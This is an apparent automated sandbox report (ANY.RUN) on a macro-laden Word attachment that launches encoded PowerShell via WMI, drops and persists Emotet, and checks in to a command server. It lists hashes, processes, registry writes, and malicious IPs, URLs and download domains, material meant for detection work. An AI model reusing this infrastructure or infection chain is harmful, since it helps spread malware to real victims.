File name: Attachment-092019.doc
Full analysis: https://app.any.run/tasks/6d8ba3a2-79d6-4b27-aa0c-437a5ab20cbb
Verdict: Malicious activity
Threats: Emotet

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 19, 2019, 10:10:01
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open, generated-doc, emotet, trojan, emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: violet Place vertical, Subject: Consultant, Author: Mohammed Hintz, Comments: functionalities, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 19 08:35:00 2019, Last Saved Time/Date: Thu Sep 19 08:35:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5: 681A63D4FA3D6ED4FFE9911A1B27F2DC
SHA1: 48C4145A239522BD01AC22B253D479920B1E7C39
SHA256: 6FEF8784C06172D05979F764C7F602B271F218FF3C1BF38391666D79B1AA832C
SSDEEP: 6144:vCH72i0o89p8gh2UvtYeREBLkI07NSU4jUntATfDvXt:vCH72i0o89p8gh2UvtYeRgX07NSU4ee9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 208.exe (PID: 1920)
      • 208.exe (PID: 3120)
      • 208.exe (PID: 2404)
      • 208.exe (PID: 2068)
      • easywindow.exe (PID: 3792)
      • easywindow.exe (PID: 2904)
      • easywindow.exe (PID: 2796)
      • easywindow.exe (PID: 3684)
    • Emotet process was detected

      • 208.exe (PID: 2404)
    • EMOTET was detected

      • easywindow.exe (PID: 3684)
    • Changes the autorun value in the registry

      • easywindow.exe (PID: 3684)
    • Connects to CnC server

      • easywindow.exe (PID: 3684)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 2480)
    • Creates files in the user directory

      • powershell.exe (PID: 2480)
    • Executed via WMI

      • powershell.exe (PID: 2480)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2480)
      • 208.exe (PID: 2404)
    • Starts itself from another location

      • 208.exe (PID: 2404)
    • Application launched itself

      • easywindow.exe (PID: 3792)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3648)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3648)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2480)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: violet Place vertical
Subject: Consultant
Author: Mohammed Hintz
Keywords: -
Comments: functionalities
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:19 07:35:00
ModifyDate: 2019:09:19 07:35:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Gislason and Sons
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Farrell
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
All screenshots are available in the full report
Total processes: 44
Monitored processes: 10
Malicious processes: 8
Suspicious processes: 1

Behavior graph

Interactive graph; per-process details are in the full report. Nodes shown: winword.exe, powershell.exe, 208.exe (four instances, one flagged #EMOTET), easywindow.exe (four instances, one flagged #EMOTET). Edge labels: start, drop and start, drop and start.

Process information

PID: 3648
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Attachment-092019.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 2480
CMD: powershell -encod …
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: wmiprvse.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 1920
CMD: "C:\Users\admin\208.exe"
Path: C:\Users\admin\208.exe
Parent process: powershell.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2068
CMD: "C:\Users\admin\208.exe"
Path: C:\Users\admin\208.exe
Parent process: 208.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3120
CMD: --7522c4b8
Path: C:\Users\admin\208.exe
Parent process: 208.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2404
CMD: --7522c4b8
Path: C:\Users\admin\208.exe
Parent process: 208.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3792
CMD: "C:\Users\admin\AppData\Local\easywindow\easywindow.exe"
Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
Parent process: 208.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2796
CMD: "C:\Users\admin\AppData\Local\easywindow\easywindow.exe"
Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
Parent process: easywindow.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 2904
CMD: --fd47f3b8
Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
Parent process: easywindow.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Exit code: 0
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

PID: 3684
CMD: --fd47f3b8
Path: C:\Users\admin\AppData\Local\easywindow\easywindow.exe
Parent process: easywindow.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Display Control Panel
Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events: 1 765
Read events: 1 273
Write events: 487
Delete events: 5

Modification events

Process: (3648) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write
Name: d`$
Value: 64602400400E0000010000000000000000000000

Process: (3648) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write
Name: 1033
Value: Off

Process: (3648) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation: write
Name: 1033
Value: On

Process: (3648) WINWORD.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation: write
Name: WORDFiles
Value: 1328742430

Process: (3648) WINWORD.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation: write
Name: ProductFiles
Value: 1328742544

Process: (3648) WINWORD.EXE
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation: write
Name: ProductFiles
Value: 1328742545

Process: (3648) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation: write
Name: MTTT
Value: 400E0000AED47B70D26ED50100000000

Process: (3648) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: write
Name: -a$
Value: 2D612400400E000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000

Process: (3648) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation: delete value
Name: -a$
Value: 2D612400400E000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000

Process: (3648) WINWORD.EXE
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation: write
Name: UNCAsIntranet
Value: 0
Executable files: 2
Suspicious files: 10
Text files: 0
Unknown types: 43

Dropped files

PID: 3648
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVR9C64.tmp.cvr
Type: -
MD5: -
SHA256: -

PID: 3648
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE193719.wmf
Type: wmf
MD5: CE3EF45381D827D23D287AC544B62DF4
SHA256: F1E7ECDDD0669D79EF30DB37FD565EEA9E7317CF1685B7C6A7C58B7E80FDE0A4

PID: 3648
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd
Type: tlb
MD5: BC9B655AD54B0B824F4AC621D781085D
SHA256: ED43FAB52F56D2D6E7FB43A8B4E0FDDF1D0E7ACD909BFB41FCAA8DEBBB857DE4

PID: 3648
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\~$tachment-092019.doc
Type: pgc
MD5: 8FE7D96090B99D7B04EA03E2433B6643
SHA256: FD7B4ADA16E5A54B7E777520C11DBA48F5A43D852223CA79EC5C31C720279CFB

PID: 3648
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Type: pgc
MD5: D8A3C78037662892E9FAF70E28BDC6D9
SHA256: 2AFBB8A7DCB7B20E5167BA320E64EEAE43B40751E825F274A797DB8DE421D750

PID: 3648
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A8D800F2.wmf
Type: wmf
MD5: C910D547CDB12F4185FD93C214BFCF60
SHA256: 939C550745B57E4920C6349AD42E505A7BBAE9A715627523D3710884055DAE43

PID: 3648
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\60F9401C.wmf
Type: wmf
MD5: DDDE53CD307DDDDB80C50A103824BA85
SHA256: 85BFC65C2123EA7F79C12C5847809F2270560CC4893896DCC403A085CF4A5068

PID: 3648
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BAFA784B.wmf
Type: wmf
MD5: 95840E3973B8522B6C5BE720BF741A9A
SHA256: B7C35596D852DFCFBD2E8A4817EBE196F31224F4561D913563570B7B77B69C53

PID: 3648
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DB03C18F.wmf
Type: wmf
MD5: 8706686C8F37C2536C6A1A12686B7273
SHA256: F7E26261F4E359E3F66108631E649DFAA10A17551FBDB17D5D87595825E83995

PID: 3648
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\14ACC246.wmf
Type: wmf
MD5: 9CD4F92AF225D2D585646598F5B2C881
SHA256: 5B60314B658BE5222A1CD3BC5D9E9F0D79AD6D78BC1AEA5B1D67885583DB7302
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 1
TCP/UDP connections: 3
DNS requests: 4
Threats: 0

HTTP requests

PID: 3684
Process: easywindow.exe
Method: POST
HTTP Code: 200
IP: 114.79.134.129:443
URL: http://114.79.134.129:443/health/iab/
CN: IN
Type: binary
Size: 132 b
Reputation: malicious

Connections

PID: 3684
Process: easywindow.exe
IP: 114.79.134.129:443
Domain: -
ASN: D-Vois Broadband Pvt Ltd
CN: IN
Reputation: malicious

PID: 2480
Process: powershell.exe
IP: 209.236.112.54:443
Domain: www.rangreality.com
ASN: Dallas Infrastructure Services, LLC
CN: US
Reputation: suspicious

PID: 2480
Process: powershell.exe
IP: 45.76.184.98:80
Domain: thefortunatenutrition.com
ASN: Choopa, LLC
CN: SG
Reputation: suspicious

DNS requests

Domain: thefortunatenutrition.com
IP: 45.76.184.98
Reputation: malicious

Domain: dns.msftncsi.com
IP: 131.107.255.255
Reputation: shared

Domain: www.rangreality.com
IP: 209.236.112.54
Reputation: unknown

Threats

PID: 3684
Process: easywindow.exe
Class: A Network Trojan was detected
Message: AV TROJAN W32/Emotet CnC Checkin (Apr 2019)

PID: 3684
Process: easywindow.exe
Class: A Network Trojan was detected
Message: MALWARE [PTsecurity] Feodo/Emotet

PID: 3684
Process: easywindow.exe
Class: Potentially Bad Traffic
Message: ET POLICY HTTP traffic on port 443 (POST)
3 ETPRO signatures available at the full report
No debug info